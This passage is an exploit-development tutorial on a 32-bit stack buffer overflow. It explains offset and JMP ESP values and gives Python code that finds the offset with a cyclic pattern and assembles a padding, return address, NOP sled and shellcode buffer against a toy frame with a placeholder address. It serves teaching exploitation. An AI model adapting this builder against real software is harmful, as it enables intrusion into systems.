To exploit the application and gain access to the target system, we need to know the values listed in the following table:

Component | Use
--- | ---
Offset | We crashed the application in the previous section. To exploit it, however, we need the exact number of bytes that fills the vulnerable buffer and overwrites the saved EBP, so that the next four bytes of our input land on the saved return address and are loaded into EIP when the function returns. We refer to this number of bytes, the amount of data that lands us right before the EIP slot, as the offset.
Jump address/Ret | This is the address we write over the saved return address, that is, the value EIP will hold. Specifically, it is the address of a JMP ESP instruction inside a DLL loaded by the process; after the return, ESP points just past the overwritten return address, so JMP ESP transfers execution into the payload that follows it. ...
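The two values in the table are normally found with a cyclic pattern: send a pattern in which every four-byte window is unique, read the value EIP holds at the crash, and look that value up in the pattern to get the offset. The following is an added example, not code from the original page; it generates a Metasploit-style pattern, computes the offset from a crash value, and assembles the final buffer as offset padding, the JMP ESP address, a NOP sled and the shellcode. The vulnerable frame is modelled by a constructed `toy_crash` function (32-byte buffer followed by the saved EBP and the return address), and the JMP ESP address `0x625011AF` is a placeholder, not a real one taken from any DLL.

```python
import string
import struct
from typing import Optional


def cyclic_pattern(length: int) -> bytes:
    """Metasploit-style pattern (Aa0Aa1...Aa9Ab0...). Every 4-byte window is
    unique for lengths up to 20280 bytes, which is what makes the offset lookup work."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def find_offset(eip_value: int, length: int = 20280) -> int:
    """Given the 32-bit value EIP held at the crash (as read from the debugger),
    return how many bytes of input precede the saved return address."""
    needle = struct.pack("<I", eip_value)  # x86 is little-endian: reverse the bytes
    idx = cyclic_pattern(length).find(needle)
    if idx < 0:
        raise ValueError("EIP value not found in pattern; was the crash caused by the pattern?")
    return idx


def toy_crash(payload: bytes, buf_size: int = 32) -> Optional[int]:
    """Constructed model of the vulnerable stack frame: [buf][saved EBP][return address].
    Returns the value EIP would take after `ret`, or None if the return address is untouched."""
    ret_off = buf_size + 4  # the 4 bytes of saved EBP sit between the buffer and the return address
    if len(payload) < ret_off + 4:
        return None
    return struct.unpack("<I", payload[ret_off:ret_off + 4])[0]


def has_bad_chars(addr: int, bad: bytes) -> bool:
    """True if the little-endian encoding of addr contains a byte the target mangles
    or truncates on (a NUL for a C string, 0x0a/0x0d for a line-based protocol)."""
    return any(b in bad for b in struct.pack("<I", addr))


def build_exploit(offset: int, jmp_esp_addr: int, shellcode: bytes,
                  nop_sled: int = 16, bad: bytes = b"\x00\x0a\x0d") -> bytes:
    """Assemble [padding][JMP ESP address][NOP sled][shellcode].
    After the overwritten `ret`, ESP points at the NOP sled, so JMP ESP lands in it
    and execution slides into the shellcode."""
    if has_bad_chars(jmp_esp_addr, bad):
        raise ValueError(f"jump address {jmp_esp_addr:#010x} contains a bad character")
    return (b"A" * offset
            + struct.pack("<I", jmp_esp_addr)
            + b"\x90" * nop_sled
            + shellcode)


if __name__ == "__main__":
    # Step 1: crash the toy target with the pattern and read "EIP".
    eip = toy_crash(cyclic_pattern(200))
    # Step 2: turn the crash value into the offset.
    offset = find_offset(eip)
    print(f"EIP={eip:#010x} offset={offset}")
    # Step 3: build the real buffer. 0xcc (int3) stands in for shellcode; the address is a placeholder.
    buf = build_exploit(offset, 0x625011AF, b"\xcc" * 4)
    print(buf)
```

Two checks matter in practice. First, confirm the offset with a second send where the four bytes at `offset` are a marker such as `BBBB` and EIP reads `0x42424242`; a value found in the pattern at the wrong place (for example a partial overwrite) would otherwise be misleading. Second, reject any candidate JMP ESP address whose bytes include characters the target strips, which is what the bad-character filter in `build_exploit` does.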